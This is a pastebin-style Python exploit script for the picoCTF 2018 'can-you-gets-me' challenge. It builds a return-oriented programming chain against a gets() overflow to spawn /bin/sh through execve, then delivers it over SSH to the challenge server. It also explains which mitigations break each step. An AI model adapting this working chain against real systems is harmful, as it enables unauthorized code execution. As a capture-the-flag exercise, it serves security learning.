Untitled

a guest
Jan 4th, 2019
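"""picoCTF 2018 "can-you-gets-me": ROP chain against a gets()-based overflow.

The target binary is statically linked and not position independent, so every
gadget below sits at a fixed address and no leak is required.  The chain writes
the string "/bin//sh" plus a NUL dword into .data and then issues the execve
system call (int 0x80 with eax = 11) with ebx = path and ecx = edx = pointer to
the NUL dword, i.e. an empty argv/envp.

Mitigation view: gets() cannot bound its read, which is why a fixed amount of
filler reaches the saved return address.  A stack protector, PIE/ASLR and a
bounded read (fgets) each break one step of this chain.

Usage: python exploit.py <username> [password]
When the password is omitted it is prompted for, so it does not end up in shell
history or process listings.
"""
from pwn import *

# Stdlib imports deliberately come *after* the pwn star-import: pwn also
# exports its own pack(), and the struct version must win for pack('<I', ...).
import sys
from getpass import getpass
from struct import pack

# Offset from the start of the gets() buffer to the saved return address,
# taken as given from the original exploit for this build of ./gets.
PADDING = b'A' * 28

# Writable scratch area used to stage the path string.
DATA = 0x080ea060            # @ .data

# Gadget addresses (static, non-PIE binary).
POP_EDX = 0x0806f02a         # pop edx ; ret
POP_EAX = 0x080b81c6         # pop eax ; ret
POP_EBX = 0x080481c9         # pop ebx ; ret
POP_ECX = 0x080de955         # pop ecx ; ret
MOV_EDX_EAX = 0x080549db     # mov dword ptr [edx], eax ; ret
XOR_EAX = 0x08049303         # xor eax, eax ; ret
INC_EAX = 0x0807a86f         # inc eax ; ret
INT_80 = 0x0806cc25          # int 0x80

# i386 execve syscall number; reached by repeating the inc eax gadget.
SYS_EXECVE = 11


def gadget(value):
    """Return *value* (gadget address or immediate) as a little-endian dword."""
    return pack('<I', value)


def write_dword(addr, raw):
    """Gadget sequence storing the 4 raw bytes *raw* at *addr* via edx/eax.

    Raises ValueError when *raw* is not exactly 4 bytes, since the mov gadget
    stores a full dword and a shorter value would desynchronise the chain.
    """
    if len(raw) != 4:
        raise ValueError('write_dword expects exactly 4 bytes, got %d' % len(raw))
    return (gadget(POP_EDX) + gadget(addr)
            + gadget(POP_EAX) + raw
            + gadget(MOV_EDX_EAX))


def build_chain():
    """Return the full payload: filler followed by the execve ROP chain.

    Everything is built as bytes so the same script works under both the
    Python 2 and Python 3 builds of pwntools (str + bytes raises on 3).
    """
    return b''.join([
        PADDING,
        write_dword(DATA, b'/bin'),
        write_dword(DATA + 4, b'//sh'),
        # NUL-terminate the path; eax is zeroed with a gadget rather than popped.
        gadget(POP_EDX), gadget(DATA + 8),      # @ .data + 8
        gadget(XOR_EAX),
        gadget(MOV_EDX_EAX),
        # execve(path, argv, envp): ebx = path, ecx = edx = pointer to NUL dword.
        gadget(POP_EBX), gadget(DATA),          # @ .data
        gadget(POP_ECX), gadget(DATA + 8),      # @ .data + 8
        gadget(POP_EDX), gadget(DATA + 8),      # @ .data + 8
        gadget(XOR_EAX),
        gadget(INC_EAX) * SYS_EXECVE,
        gadget(INT_80),
    ])


def main(argv):
    """Connect to the challenge shell, run ./gets and deliver the chain.

    argv[1] is the picoCTF username; argv[2], when present, the password.
    Exits with a usage message when the username is missing.
    """
    if len(argv) < 2:
        sys.exit('usage: %s <username> [password]' % argv[0])
    user = argv[1]
    password = argv[2] if len(argv) > 2 else getpass('picoCTF password: ')

    shell = ssh(host='2018shell1.picoctf.com', user=user, password=password)
    try:
        shell.set_working_directory('/problems/can-you-gets-me_0_8ac5bddeab74e647cd6d31642246a12a')
        target = shell.process('./gets')
        # The binary prints a prompt ending in '!' before calling gets().
        target.sendlineafter(b'!', build_chain())
        target.interactive()
    finally:
        # Always tear down the SSH session, even if interactive() is interrupted.
        shell.close()


if __name__ == '__main__':
    main(sys.argv)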